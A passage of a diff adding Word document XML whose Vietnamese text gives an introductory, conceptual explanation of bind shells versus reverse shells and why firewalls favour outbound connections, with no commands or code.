+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bind shell. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Nhưng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vấn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đề</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>xảy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nếu</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>máy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>chủ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kia</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>truy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cập</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trực</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tiếp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ví</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dụ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>là</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thể</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>không</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> public IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hoặc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bảo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>vệ</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>với</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Firewall </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>thì</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sao</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">? </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Trong</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>trường</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>hợp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>này</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, Reverse shell </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>cần</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>được</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>sử</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dụng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>khi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>mà</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>có</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>một</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>bên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>ngoài</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>để</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> host </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>lắng</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nghe</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>đến</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>và</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>tạo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>nên</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> shell session.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1B1B1B"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Firewall </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>thì</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>đa</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>số</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lọc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>các</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kết</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nối</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>từ</w:t>
